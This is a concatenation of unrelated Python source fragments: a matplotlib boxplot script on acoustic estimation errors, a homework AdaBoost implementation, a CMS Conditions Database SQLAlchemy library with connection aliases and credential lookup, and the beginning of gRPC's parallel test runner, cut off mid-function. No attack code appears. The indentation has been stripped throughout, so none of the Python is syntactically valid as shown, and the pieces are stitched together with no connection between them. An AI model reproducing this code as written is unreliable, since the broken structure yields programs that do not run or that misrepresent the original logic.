bplot12=axs[5,1].boxplot([err_8,err2_8,err3_8,err4_8],showmeans=True,vert=True,showfliers=out_rt,patch_artist=True)
axs[5,1].set_xticks([1,2,3,4])
axs[5,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[5,1].set_ylabel("Abs Err Sec")
axs[5,1].set_title("RT 60 4000hz")
bplot13=axs[6,0].boxplot([err_1,err2_1,err3_1,err4_1],showmeans=True,vert=True,showfliers=True,patch_artist=True)
axs[6,0].set_xticks([1,2,3,4])
axs[6,0].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[6,0].set_ylabel("Abs Err M2")
axs[6,0].set_title("Surface")
bplot14=axs[6,1].boxplot([err_2,err2_2,err3_2,err4_2],showmeans=True,vert=True,showfliers=True,patch_artist=True)
axs[6,1].set_xticks([1,2,3,4])
axs[6,1].set_xticklabels(['MN 1 vp','MN 2 vp','MN 3 vp','MN WM'],rotation=45)
axs[6,1].set_ylabel("Abs Err M3")
axs[6,1].set_title("Volume")
colors=['pink','lightblue','lightgreen','orange','cyan']
for bplot in (bplot1,bplot2,bplot3,bplot4,bplot5,bplot6,bplot7,bplot8,bplot9,bplot10,bplot11,bplot12,bplot13,bplot14):
for patch,color in zip(bplot['boxes'],colors):
patch.set_facecolor(color)
fig.tight_layout(pad=3.0)
#plt.xticks([1,2,3],('Dummy Bnf','bnf','Dummy M','M'))
#plt.title("Absolute Diff Estimated Mean And Target RT60")
plt.savefig("test_mono_comparasion.png")
|
the-stack_106_14809
|
from typing import Tuple
import numpy as np
import pandas as pd
from HW4.decisionstump import DecisionStump
class Adaboost:
def __init__(self):
self.T = 0
self.h = []
self.alpha = pd.Series([])
self.w = pd.DataFrame([])
def train(self, X_train: pd.DataFrame, y_train: pd.Series,
n_iter: int = 10):
# Initialize parameters
N, D = X_train.shape
self.T = n_iter
self.h = []
self.alpha = []
self.w = []
w_t = pd.Series(np.full(N, 1/N), index=y_train.index, name=f"iter 0")
# Boosting
for t in range(self.T):
h_t = DecisionStump()
# Compute the weighted training error of h_t
err_t = h_t.train(X_train, y_train, w_t)
# Compute the importance of h_t
alpha_t = 0.5 * np.log((1 - err_t) / err_t)
# Update the weights
h_t_pred = h_t.predict(X_train)
w_t = w_t * np.exp(-alpha_t * y_train * h_t_pred)
w_t = w_t / w_t.sum()
w_t = pd.Series(w_t, index=y_train.index, name=f"iter {t+1}")
# Store parameters
self.h.append(h_t)
self.alpha.append(alpha_t)
self.w.append(w_t)
self.alpha = pd.Series(self.alpha, name='importance')
self.w = pd.DataFrame(self.w).T
def predict(self, X_test: pd.DataFrame) -> pd.Series:
# h_pred: shape=(T, N), predictions by all the weak classifiers
h_pred = np.array([h_t.predict(X_test).to_numpy() for h_t in self.h])
# alpha: shape=(T,), importance of each weak classifier
alpha = np.array(self.alpha)
y_pred = np.sign(np.einsum('ti,t->i', h_pred, alpha))
y_pred = pd.Series(y_pred, index=X_test.index, name='y_pred')
return y_pred
def eval_model(self, X_test: pd.DataFrame, y_test: pd.Series, full: bool = False):
if not full:
y_pred = self.predict(X_test)
acc = self.acc(y_pred, y_test)
return y_pred, acc
else:
y_preds = []
accs = []
for t in range(self.T):
alpha, h = self.alpha[:t+1], self.h[:t+1]
y_pred = self._predict(X_test, alpha, h)
y_pred.name = f"iter {t+1}"
y_preds.append(y_pred)
accs.append(self.acc(y_pred, y_test))
y_preds = pd.DataFrame(y_preds).T
accs = pd.Series(accs, name='accuracy')
return y_preds, accs
@staticmethod
def acc(y_pred: pd.Series, y_true: pd.Series) -> float:
return np.average(y_pred.to_numpy() == y_true.to_numpy())
@staticmethod
def _predict(X_test: pd.DataFrame, alpha: pd.Series, h: list):
# h_pred: shape=(T, N), predictions by all the weak classifiers
h_pred = np.array([h_t.predict(X_test).to_numpy() for h_t in h])
# alpha: shape=(T,), importance of each weak classifier
alpha = np.array(alpha)
y_pred = np.sign(np.einsum('ti,t->i', h_pred, alpha))
y_pred = pd.Series(y_pred, index=X_test.index, name='y_pred')
return y_pred
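# Hedged usage sketch (an illustration added here, not part of the original
# homework code): train on a small synthetic binary dataset with labels in
# {-1, +1} and print the per-round training accuracy. Assumes the
# HW4.decisionstump.DecisionStump interface already used by Adaboost.train.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    X_demo = pd.DataFrame(rng.normal(size=(200, 5)),
                          columns=[f"f{i}" for i in range(5)])
    y_demo = pd.Series(np.where(X_demo["f0"] + X_demo["f1"] > 0, 1, -1),
                       name="label")
    booster = Adaboost()
    booster.train(X_demo, y_demo, n_iter=5)
    _, accs = booster.eval_model(X_demo, y_demo, full=True)
    print(accs)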
|
the-stack_106_14810
|
'''CMS Conditions DB Python library.
'''
__author__ = 'Miguel Ojeda'
__copyright__ = 'Copyright 2013, CERN'
__credits__ = ['Giacomo Govi', 'Miguel Ojeda', 'Andreas Pfeiffer']
__license__ = 'Unknown'
__maintainer__ = 'Giacomo Govi'
__email__ = '[email protected]'
import os
import sys
import hashlib
import logging
import sqlalchemy
import sqlalchemy.ext.declarative
import enum
from sqlalchemy import Enum
schema_name = 'CMS_CONDITIONS'
dbuser_name = 'cms_conditions'
dbreader_user_name = 'cms_cond_general_r'
dbwriter_user_name = 'cms_cond_general_w'
logger = logging.getLogger(__name__)
#authentication/authorization params
authPathEnvVar = 'COND_AUTH_PATH'
dbkey_filename = 'db.key'
dbkey_folder = os.path.join('.cms_cond',dbkey_filename)
# frontier services
PRO ='PromptProd'
ARC ='FrontierArc'
INT ='FrontierInt'
DEV ='FrontierPrep'
# oracle read only services
ORAPRO = 'cms_orcon_adg'
ORAARC = 'cmsarc_lb'
# oracle masters
ORAINT = 'cms_orcoff_int'
ORADEV = 'cms_orcoff_prep'
ONLINEORAPRO = 'cms_orcon_prod'
ONLINEORAINT = 'cmsintr_lb'
# Set initial level to WARN. This is so that log statements don't occur in
# the absence of explicit logging being enabled.
if logger.level == logging.NOTSET:
logger.setLevel(logging.WARN)
# Utility functions
def hash(data):
return hashlib.sha1(data.encode('ascii')).hexdigest()
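# Hedged illustration (added, not in the original module): the payload hash is
# a plain SHA-1 hex digest; the empty string maps to the well-known value
# below, which is also where hash_length further down comes from.
def _hash_example():
    assert hash('') == 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
    assert len(hash('')) == 40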
# Constants
empty_label = '-'
name_length = 100
description_length = 4000
hash_length = len(hash(''))
web_experts_email = '[email protected]'
offline_db_experts_email = '[email protected]'
offline_db_experts_phone = '+41 22 76 70817, or 70817 from CERN; check https://twiki.cern.ch/twiki/bin/viewauth/CMS/DBShifterHelpPage if it does not work; availability depends on the state of the LHC'
contact_help = 'If you need assistance, please write an email to %s and %s. If you need immediate/urgent assistance, you can call the Offline DB expert on call (%s).' % (offline_db_experts_email, web_experts_email, offline_db_experts_phone)
database_help = '''
The database parameter (--db) refers to the database where the tool
will connect to read all the data. By default, the production account
(through Frontier) will be used.
In subcommands which take a source and a destination, --db always refers to
the source, and --destdb to the destination. For both of them the following
rules apply.
The database parameter can be an official alias, a filename or any
valid SQLAlchemy URL.
The official aliases are the following strings (first column):
Alias Level Database RO/RW Notes
------------ ----------- ------------- ---------- -------------------------------
pro Production Frontier (ADG) read-only Default.
arc Archive Frontier read-only
int Integration Frontier read-only
dev Development Frontier read-only
boost Production Frontier read-only
boostprep Development Frontier read-only
orapro Production Oracle (ADG) read-only Password required.
oraarc Archive Oracle read-only Password required.
oraint Integration Oracle read-write Password required.
oradev Development Oracle read-write Password required.
onlineorapro Production Oracle read-write Password required. Online only.
onlineoraint Online Int Oracle read-write Password required. Online only.
Most of the time, if you are a regular user, you will want to read/copy
conditions from the Frontier production account. Therefore, you can omit
the --db parameter, unless you want to read from somewhere else,
e.g. from your local SQLite file.
In addition, the parameter may be a filename (path) pointing to a local
SQLite file, e.g.
file.db
relative/path/to/file.db
/absolute/path/to/file.db
Finally, any valid SQLAlchemy URL can be used. This allows full
flexibility in cases where it may be needed, e.g.
sqlite:// In-memory, volatile SQLite DB.
oracle://user@devdb11 Your private Oracle DB in devdb11 [*]
[*] See https://account.cern.ch/ -> Services for more information
on personal Oracle accounts.
For the official aliases, the password will be asked automatically
interactively. The same applies for Oracle URLs where the password
was not provided inside it, e.g.:
oracle://user@devdb11 The tool will prompt you for the password.
oracle://user:pass@devdb11 Password inlined. [+]
[+] Caution: Never write passwords in command-line parameters in
multi-user machines (e.g. lxplus), since other users can see them
in the process table (e.g. ps).
This means that both the official aliases and the filenames are shortcuts
to the full SQLAlchemy URL equivalents, e.g. the following are the same:
relative/path/to/file.db === sqlite:///relative/path/to/file.db
/absolute/path/to/file.db === sqlite:////absolute/path/to/file.db
'''
def oracle_connection_string(db_service, db_schema ):
return 'oracle://%s/%s'%(db_service,db_schema)
class Synchronization(enum.Enum):
any = 'any'
validation = 'validation'
mc = 'mc'
runmc = 'runmc'
hlt = 'hlt'
express = 'express'
prompt = 'prompt'
pcl = 'pcl'
offline = 'offline'
synch_list = list(x.value for x in list(Synchronization))
class TimeType(enum.Enum):
Run = 'Run'
Time = 'Time'
Lumi = 'Lumi'
Hash = 'Hash'
User = 'User'
# Schema definition
_Base = sqlalchemy.ext.declarative.declarative_base()
def fq_name( schema_name, table_name ):
name = table_name
if schema_name is not None:
name = '%s.%s' %(schema_name, table_name)
return name
db_models = {}
class _Col(Enum):
nullable = 0
notNull = 1
pk = 2
class DbRef:
def __init__(self,refType, refColumn):
self.rtype = refType
self.rcol = refColumn
def fq_col( schema, table, column ):
fqn = '%s.%s' %(table, column)
if schema is not None:
fqn = '%s.%s' %(schema,fqn)
return fqn
def make_dbtype( backendName, schemaName, baseType ):
members = {}
deps_reg = set()
dbtype_name = '%s_%s' %(baseType.__name__,backendName)
members['__tablename__'] = baseType.__tablename__
members['__table_args__'] = None
if schemaName is not None:
members['__table_args__'] = {'schema': schemaName }
for k,v in baseType.columns.items():
if isinstance(v[0],DbRef):
refColDbt = v[0].rtype.columns[v[0].rcol][0]
pk = (True if v[1]==_Col.pk else False)
if v[1]==_Col.pk:
members[k] = sqlalchemy.Column(refColDbt,sqlalchemy.ForeignKey(fq_col(schemaName,v[0].rtype.__tablename__,v[0].rcol)),primary_key=True)
else:
nullable = (False if v[1] == _Col.notNull else True)
members[k] = sqlalchemy.Column(refColDbt,sqlalchemy.ForeignKey(fq_col(schemaName,v[0].rtype.__tablename__,v[0].rcol)),nullable=nullable)
if v[0].rtype.__name__ not in deps_reg:
deps_reg.add(v[0].rtype.__name__)
reftype_name = '%s_%s' %(v[0].rtype.__name__,backendName)
members[(v[0].rtype.__name__).lower()] = sqlalchemy.orm.relationship(reftype_name)
else:
if v[1]==_Col.pk:
members[k] = sqlalchemy.Column(v[0],primary_key=True)
else:
nullable = (True if v[1]==_Col.nullable else False)
members[k] = sqlalchemy.Column(v[0],nullable=nullable)
dbType = type(dbtype_name,(_Base,),members)
if backendName not in db_models.keys():
db_models[backendName] = {}
db_models[backendName][baseType.__name__] = dbType
return dbType
def getSchema(tp):
if tp.__table_args__ is not None:
return tp.__table_args__['schema']
return None
class Tag:
__tablename__ = 'TAG'
columns = { 'name': (sqlalchemy.String(name_length),_Col.pk),
'time_type': (sqlalchemy.Enum(*tuple(TimeType.__members__.keys())),_Col.notNull),
'object_type': (sqlalchemy.String(name_length),_Col.notNull),
'synchronization': (sqlalchemy.Enum(*tuple(Synchronization.__members__.keys())),_Col.notNull),
'description': (sqlalchemy.String(description_length),_Col.notNull),
'last_validated_time':(sqlalchemy.BIGINT,_Col.notNull),
'end_of_validity':(sqlalchemy.BIGINT,_Col.notNull),
'insertion_time':(sqlalchemy.TIMESTAMP,_Col.notNull),
'modification_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class TagMetadata:
__tablename__ = 'TAG_METADATA'
columns = { 'tag_name': (DbRef(Tag,'name'),_Col.pk),
'min_serialization_v': (sqlalchemy.String(20),_Col.notNull),
'min_since': (sqlalchemy.BIGINT,_Col.notNull),
'modification_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class Payload:
__tablename__ = 'PAYLOAD'
columns = { 'hash': (sqlalchemy.CHAR(hash_length),_Col.pk),
'object_type': (sqlalchemy.String(name_length),_Col.notNull),
'data': (sqlalchemy.BLOB,_Col.notNull),
'streamer_info':(sqlalchemy.BLOB,_Col.notNull),
'version':(sqlalchemy.String(20),_Col.notNull),
'insertion_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class IOV:
__tablename__ = 'IOV'
columns = { 'tag_name':(DbRef(Tag,'name'),_Col.pk),
'since':(sqlalchemy.BIGINT,_Col.pk),
'insertion_time':(sqlalchemy.TIMESTAMP,_Col.pk),
'payload_hash':(DbRef(Payload,'hash'),_Col.notNull) }
class GlobalTag:
__tablename__ = 'GLOBAL_TAG'
columns = { 'name':(sqlalchemy.String(name_length),_Col.pk),
'validity': (sqlalchemy.BIGINT,_Col.notNull),
'description':(sqlalchemy.String(description_length),_Col.notNull),
'release':(sqlalchemy.String(name_length),_Col.notNull),
'insertion_time':(sqlalchemy.TIMESTAMP,_Col.notNull),
'snapshot_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class GlobalTagMap:
__tablename__ = 'GLOBAL_TAG_MAP'
columns = { 'global_tag_name':(DbRef(GlobalTag,'name'),_Col.pk),
'record':(sqlalchemy.String(name_length),_Col.pk),
'label':(sqlalchemy.String(name_length),_Col.pk),
'tag_name':(DbRef(Tag,'name'),_Col.notNull) }
class TagLog:
__tablename__ = 'TAG_LOG'
columns = { 'tag_name':(DbRef(Tag,'name'),_Col.pk),
'event_time':(sqlalchemy.TIMESTAMP,_Col.pk),
'action':(sqlalchemy.String(100),_Col.pk),
'user_name':(sqlalchemy.String(100),_Col.notNull),
'host_name':(sqlalchemy.String(100),_Col.notNull),
'command':(sqlalchemy.String(500),_Col.notNull),
'user_text':(sqlalchemy.String(4000),_Col.notNull) }
class RunInfo:
__tablename__ = 'RUN_INFO'
columns = { 'run_number':(sqlalchemy.BIGINT,_Col.pk),
'start_time':(sqlalchemy.TIMESTAMP,_Col.notNull),
'end_time':(sqlalchemy.TIMESTAMP,_Col.notNull) }
class BoostRunMap:
__tablename__ = 'BOOST_RUN_MAP'
columns = { 'run_number':(sqlalchemy.BIGINT,_Col.pk),
'run_start_time':(sqlalchemy.TIMESTAMP,_Col.notNull),
'boost_version': (sqlalchemy.String(20),_Col.notNull) }
# CondDB object
class Connection(object):
def __init__(self, url):
# Workaround to avoid creating files if not present.
# Python's sqlite3 module does not use sqlite3_open_v2(),
# and therefore we cannot disable SQLITE_OPEN_CREATE.
# Only in the case of creating a new database we skip the check.
if url.drivername == 'sqlite':
self.engine = sqlalchemy.create_engine(url)
enabled_foreign_keys = self.engine.execute('pragma foreign_keys').scalar()
supports_foreign_keys = enabled_foreign_keys is not None
if not supports_foreign_keys:
logger.warning('Your SQLite database does not support foreign keys, so constraints will not be checked. Please upgrade.')
elif not enabled_foreign_keys:
self.engine.execute('pragma foreign_keys = on')
else:
self.engine = sqlalchemy.create_engine(url)
self._session = sqlalchemy.orm.scoped_session(sqlalchemy.orm.sessionmaker(bind=self.engine))
self._is_frontier = url.drivername == 'oracle+frontier'
self._is_oracle = url.drivername == 'oracle'
self._is_sqlite = url.drivername == 'sqlite'
self._is_read_only = self._is_frontier or url.host in {
'cms_orcon_adg',
'cmsarc_lb',
}
self._is_official = self._is_frontier or url.host in {
'cms_orcon_adg',
'cmsarc_lb',
'cms_orcoff_int',
'cms_orcoff_prep',
'cms_orcon_prod',
'cmsintr_lb',
}
self._url = url
self._backendName = ('sqlite' if self._is_sqlite else 'oracle' )
self._schemaName = ( None if self._is_sqlite else schema_name )
logging.debug('Loading db types...')
self.get_dbtype(Tag).__name__
self.get_dbtype(Payload)
self.get_dbtype(IOV)
self.get_dbtype(TagLog)
self.get_dbtype(GlobalTag)
self.get_dbtype(GlobalTagMap)
self.get_dbtype(RunInfo)
if not self._is_sqlite:
self.get_dbtype(TagMetadata)
self.get_dbtype(BoostRunMap)
self._is_valid = self.is_valid()
def get_dbtype(self,theType):
basename = theType.__name__
if self._backendName not in db_models.keys() or basename not in db_models[self._backendName].keys():
return make_dbtype( self._backendName, self._schemaName, theType )
else:
return db_models[self._backendName][basename]
def session(self):
s = self._session()
s.get_dbtype = self.get_dbtype
s._is_sqlite = self._is_sqlite
s.is_oracle = self.is_oracle
s._url = self._url
return s
@property
def metadata(self):
return _Base.metadata
@property
def is_frontier(self):
return self._is_frontier
@property
def is_oracle(self):
return self._is_oracle
@property
def is_sqlite(self):
return self._is_sqlite
@property
def is_read_only(self):
return self._is_read_only
@property
def is_official(self):
return self._is_official
def is_valid(self):
'''Tests whether the current DB looks like a valid CMS Conditions one.
'''
engine_connection = self.engine.connect()
        # temporarily avoid the check on the GT tables - there are releases in use where C++ does not create these tables.
_Tag = self.get_dbtype(Tag)
_IOV = self.get_dbtype(IOV)
_Payload = self.get_dbtype(Payload)
ret = all([self.engine.dialect.has_table(engine_connection, table.__tablename__,getSchema(table)) for table in [_Tag, _IOV, _Payload]])
engine_connection.close()
return ret
def init(self, drop=False):
'''Initializes a database.
'''
logging.info('Initializing database...')
if drop:
logging.debug('Dropping tables...')
self.metadata.drop_all(self.engine)
self._is_valid = False
else:
if not self._is_valid:
logging.debug('Creating tables...')
self.get_dbtype(Tag).__table__.create(bind = self.engine)
self.get_dbtype(Payload).__table__.create(bind = self.engine)
self.get_dbtype(IOV).__table__.create(bind = self.engine)
self.get_dbtype(TagLog).__table__.create(bind = self.engine)
self.get_dbtype(GlobalTag).__table__.create(bind = self.engine)
self.get_dbtype(GlobalTagMap).__table__.create(bind = self.engine)
self._is_valid = True
def getSessionOnMasterDB( session1, session2 ):
key = '%s/%s'
sessiondict = { }
sessiondict[key %(session1._url.drivername,session1._url.host)] = session1
sessiondict[key %(session2._url.drivername,session2._url.host)] = session2
masterkey = key %('oracle',ONLINEORAPRO)
if masterkey in sessiondict.keys():
return sessiondict[masterkey]
adgkey = key %('oracle',ORAPRO)
if adgkey in sessiondict.keys():
return sessiondict[adgkey]
frontierkey = key %('frontier',PRO)
if frontierkey in sessiondict.keys():
return sessiondict[frontierkey]
# default case: frontier on pro
conn = Connection(make_url())
session = conn.session()
# is it required?
session._conn = conn
return session
# Connection helpers
def _getCMSFrontierConnectionString(database):
import subprocess
return subprocess.Popen(['cmsGetFnConnect', 'frontier://%s' % database], stdout = subprocess.PIPE).communicate()[0].strip()
def _getCMSSQLAlchemyConnectionString(technology,service,schema_name):
if technology == 'frontier':
import urllib
import sys
py3k = sys.version_info >= (3, 0)
if py3k:
return '%s://@%s/%s' % ('oracle+frontier', urllib.parse.quote_plus(_getCMSFrontierConnectionString(service)), schema_name )
else:
return '%s://@%s/%s' % ('oracle+frontier', urllib.quote_plus(_getCMSFrontierConnectionString(service)), schema_name )
elif technology == 'oracle':
return '%s://%s@%s' % (technology, schema_name, service)
# Entry point
def make_url(database='pro',read_only = True):
if database.startswith('sqlite:') or database.startswith('sqlite_file:'):
ignore, database = database.split(':',1)
if ':' in database and '://' not in database: # check if we really got a shortcut like "pro:<schema>" (and not a url like proto://...), if so, disentangle
database, schema = database.split(':')
officialdbs = {
# frontier
'pro' : ('frontier','PromptProd', { 'R': schema_name }, ),
'arc' : ('frontier','FrontierArc', { 'R': schema_name }, ),
'int' : ('frontier','FrontierInt', { 'R': schema_name }, ),
'dev' : ('frontier','FrontierPrep', { 'R': schema_name }, ),
# oracle adg
'orapro': ('oracle', 'cms_orcon_adg', { 'R': dbreader_user_name }, ),
'oraarc': ('oracle', 'cmsarc_lb', { 'R': dbreader_user_name }, ),
# oracle masters
'oraint': ('oracle', 'cms_orcoff_int', { 'R': dbreader_user_name,
'W': dbwriter_user_name }, ),
'oradev': ('oracle', 'cms_orcoff_prep', { 'R': dbreader_user_name,
'W': dbwriter_user_name }, ),
'onlineorapro': ('oracle', 'cms_orcon_prod', { 'R': dbreader_user_name,
'W': dbwriter_user_name }, ),
'onlineoraint': ('oracle', 'cmsintr_lb', { 'R': dbreader_user_name,
'W': dbwriter_user_name }, ),
}
if database in officialdbs.keys():
key = ('R' if read_only else 'W')
mapping = officialdbs[database]
tech = mapping[0]
service = mapping[1]
schema_dict = mapping[2]
if key in schema_dict.keys():
database = _getCMSSQLAlchemyConnectionString(tech,service,schema_dict[key])
else:
raise Exception("Read-only database %s://%s cannot be accessed in update mode." %(tech,service))
logging.debug('connection string set to "%s"' % database)
try:
url = sqlalchemy.engine.url.make_url(database)
except sqlalchemy.exc.ArgumentError:
url = sqlalchemy.engine.url.make_url('sqlite:///%s' % database)
return url
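# Hedged example (added for illustration, not part of the original library):
# make_url accepts the same forms documented in database_help above -- a bare
# filename becomes a SQLite URL, while an explicit SQLAlchemy URL is passed
# through unchanged. Official aliases such as 'pro' also resolve here, but
# that shells out to cmsGetFnConnect, so they are not exercised in this sketch.
def _make_url_examples():
    file_url = make_url('relative/path/to/file.db')
    assert file_url.drivername == 'sqlite'
    assert file_url.database == 'relative/path/to/file.db'
    oracle_url = make_url('oracle://user@devdb11', read_only=False)
    assert oracle_url.drivername == 'oracle'
    return file_url, oracle_url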
def connect(url, authPath=None, verbose=0):
'''Returns a Connection instance to the CMS Condition DB.
See database_help for the description of the database parameter.
The verbosity level is as follows:
0 = No output (default).
1 = SQL statements issued, including their parameters.
2 = In addition, results of the queries (all rows and the column headers).
'''
if url.drivername == 'oracle':
if url.username is None:
logging.error('Could not resolve the username for the connection %s. Please provide a connection in the format oracle://[user]:[pass]@[host]' %url )
raise Exception('Connection format error: %s' %url )
if url.password is None:
if authPath is None:
if authPathEnvVar in os.environ:
authPath = os.environ[authPathEnvVar]
explicit_auth = False
if authPath is not None:
dbkey_path = os.path.join(authPath,dbkey_folder)
if not os.path.exists(dbkey_path):
authFile = os.path.join(authPath,'.netrc')
if os.path.exists(authFile):
entryKey = url.host.lower()+"/"+url.username.lower()
logging.debug('Looking up credentials for %s in file %s ' %(entryKey,authFile) )
import netrc
params = netrc.netrc( authFile ).authenticators(entryKey)
if params is not None:
(username, account, password) = params
url.username = username
url.password = password
else:
msg = 'The entry %s has not been found in the .netrc file.' %entryKey
raise TypeError(msg)
else:
explicit_auth =True
else:
import pluginCondDBPyBind11Interface as credential_store
connect_for_update = ( url.username == dbwriter_user_name )
connection_string = oracle_connection_string(url.host.lower(),schema_name)
logging.debug('Using db key to get credentials for %s' %connection_string )
(username,password) = credential_store.get_db_credentials(connection_string,connect_for_update,authPath)
url.username = username
url.password = password
else:
import getpass
pwd = getpass.getpass('Password for %s: ' % str(url))
if pwd is None or pwd == '':
pwd = getpass.getpass('Password for %s: ' % str(url))
if pwd is None or pwd == '':
raise Exception('Empty password provided, bailing out...')
url.password = pwd
if verbose >= 1:
logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)
if verbose >= 2:
logging.getLogger('sqlalchemy.engine').setLevel(logging.DEBUG)
return Connection(url)
def _exists(session, primary_key, value):
ret = None
try:
ret = session.query(primary_key).\
filter(primary_key == value).\
count() != 0
except sqlalchemy.exc.OperationalError:
pass
return ret
def _inserted_before(timestamp):
'''To be used inside filter().
'''
if timestamp is None:
# XXX: Returning None does not get optimized (skipped) by SQLAlchemy,
# and returning True does not work in Oracle (generates "and 1"
# which breaks Oracle but not SQLite). For the moment just use
# this dummy condition.
return sqlalchemy.literal(True) == sqlalchemy.literal(True)
return conddb.IOV.insertion_time <= _parse_timestamp(timestamp)
def listObject(session, name, snapshot=None):
is_tag = _exists(session, Tag.name, name)
result = {}
if is_tag:
result['type'] = 'Tag'
result['name'] = session.query(Tag).get(name).name
result['timeType'] = session.query(Tag.time_type).\
filter(Tag.name == name).\
scalar()
result['iovs'] = session.query(IOV.since, IOV.insertion_time, IOV.payload_hash, Payload.object_type).\
join(IOV.payload).\
filter(
IOV.tag_name == name,
_inserted_before(snapshot),
).\
order_by(IOV.since.desc(), IOV.insertion_time.desc()).\
from_self().\
order_by(IOV.since, IOV.insertion_time).\
all()
try:
is_global_tag = _exists(session, GlobalTag.name, name)
if is_global_tag:
result['type'] = 'GlobalTag'
            result['name'] = session.query(GlobalTag).get(name).name
result['tags'] = session.query(GlobalTagMap.record, GlobalTagMap.label, GlobalTagMap.tag_name).\
filter(GlobalTagMap.global_tag_name == name).\
order_by(GlobalTagMap.record, GlobalTagMap.label).\
all()
except sqlalchemy.exc.OperationalError:
sys.stderr.write("No table for GlobalTags found in DB.\n\n")
if not is_tag and not is_global_tag:
raise Exception('There is no tag or global tag named %s in the database.' % name)
return result
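# For reference, a sketch of the shape returned by listObject() (keys only; the
# values depend on the database contents):
#   tag:        {'type': 'Tag', 'name': ..., 'timeType': ...,
#                'iovs': [(since, insertion_time, payload_hash, object_type), ...]}
#   global tag: {'type': 'GlobalTag', 'name': ..., 'tags': [(record, label, tag_name), ...]}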
def getPayload(session, hash):
# get payload from DB:
data, payloadType = session.query(Payload.data, Payload.object_type).filter(Payload.hash == hash).one()
return data
|
the-stack_106_14813
|
#!/usr/bin/env python
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run tests in parallel."""
from __future__ import print_function
import argparse
import ast
import collections
import glob
import itertools
import json
import logging
import multiprocessing
import os
import os.path
import pipes
import platform
import random
import re
import socket
import subprocess
import sys
import tempfile
import traceback
import time
from six.moves import urllib
import uuid
import six
import python_utils.jobset as jobset
import python_utils.report_utils as report_utils
import python_utils.watch_dirs as watch_dirs
import python_utils.start_port_server as start_port_server
try:
from python_utils.upload_test_results import upload_results_to_bq
except ImportError:
pass # It's ok to not import because this is only necessary to upload results to BQ.
gcp_utils_dir = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../gcp/utils'))
sys.path.append(gcp_utils_dir)
_ROOT = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
os.chdir(_ROOT)
_FORCE_ENVIRON_FOR_WRAPPERS = {
'GRPC_VERBOSITY': 'DEBUG',
}
_POLLING_STRATEGIES = {
'linux': ['epollex', 'epoll1', 'poll'],
'mac': ['poll'],
}
def platform_string():
return jobset.platform_string()
_DEFAULT_TIMEOUT_SECONDS = 5 * 60
_PRE_BUILD_STEP_TIMEOUT_SECONDS = 10 * 60
def run_shell_command(cmd, env=None, cwd=None):
try:
subprocess.check_output(cmd, shell=True, env=env, cwd=cwd)
except subprocess.CalledProcessError as e:
logging.exception(
"Error while running command '%s'. Exit status %d. Output:\n%s",
e.cmd, e.returncode, e.output)
raise
def max_parallel_tests_for_current_platform():
# Too much test parallelization has only been seen to be a problem
# so far on windows.
if jobset.platform_string() == 'windows':
return 64
return 1024
# SimpleConfig: just compile with CONFIG=config, and run the binary to test
class Config(object):
def __init__(self,
config,
environ=None,
timeout_multiplier=1,
tool_prefix=[],
iomgr_platform='native'):
if environ is None:
environ = {}
self.build_config = config
self.environ = environ
self.environ['CONFIG'] = config
self.tool_prefix = tool_prefix
self.timeout_multiplier = timeout_multiplier
self.iomgr_platform = iomgr_platform
def job_spec(self,
cmdline,
timeout_seconds=_DEFAULT_TIMEOUT_SECONDS,
shortname=None,
environ={},
cpu_cost=1.0,
flaky=False):
"""Construct a jobset.JobSpec for a test under this config
Args:
cmdline: a list of strings specifying the command line the test
would like to run
"""
actual_environ = self.environ.copy()
for k, v in environ.items():
actual_environ[k] = v
if not flaky and shortname and shortname in flaky_tests:
flaky = True
if shortname in shortname_to_cpu:
cpu_cost = shortname_to_cpu[shortname]
return jobset.JobSpec(
cmdline=self.tool_prefix + cmdline,
shortname=shortname,
environ=actual_environ,
cpu_cost=cpu_cost,
timeout_seconds=(self.timeout_multiplier *
timeout_seconds if timeout_seconds else None),
flake_retries=4 if flaky or args.allow_flakes else 0,
timeout_retries=1 if flaky or args.allow_flakes else 0)
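# Illustrative only (hypothetical values): a Config turns a test command line into a
# jobset.JobSpec, applying the timeout multiplier and the flaky/retry policy above.
#
#   cfg = Config('opt', timeout_multiplier=2)
#   spec = cfg.job_spec(['bins/opt/foo_test'], shortname='foo_test',
#                       timeout_seconds=60)   # effective timeout: 120 seconds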
def get_c_tests(travis, test_lang):
out = []
platforms_str = 'ci_platforms' if travis else 'platforms'
with open('tools/run_tests/generated/tests.json') as f:
js = json.load(f)
return [
tgt for tgt in js
if tgt['language'] == test_lang and platform_string() in
tgt[platforms_str] and not (travis and tgt['flaky'])
]
def _check_compiler(compiler, supported_compilers):
if compiler not in supported_compilers:
raise Exception('Compiler %s not supported (on this platform).' %
compiler)
def _check_arch(arch, supported_archs):
if arch not in supported_archs:
raise Exception('Architecture %s not supported.' % arch)
def _is_use_docker_child():
"""Returns True if running running as a --use_docker child."""
return True if os.getenv('RUN_TESTS_COMMAND') else False
_PythonConfigVars = collections.namedtuple('_ConfigVars', [
'shell',
'builder',
'builder_prefix_arguments',
'venv_relative_python',
'toolchain',
'runner',
'test_name',
'iomgr_platform',
])
def _python_config_generator(name, major, minor, bits, config_vars):
name += '_' + config_vars.iomgr_platform
return PythonConfig(
name, config_vars.shell + config_vars.builder +
config_vars.builder_prefix_arguments +
[_python_pattern_function(major=major, minor=minor, bits=bits)] +
[name] + config_vars.venv_relative_python + config_vars.toolchain,
config_vars.shell + config_vars.runner + [
os.path.join(name, config_vars.venv_relative_python[0]),
config_vars.test_name
])
def _pypy_config_generator(name, major, config_vars):
return PythonConfig(
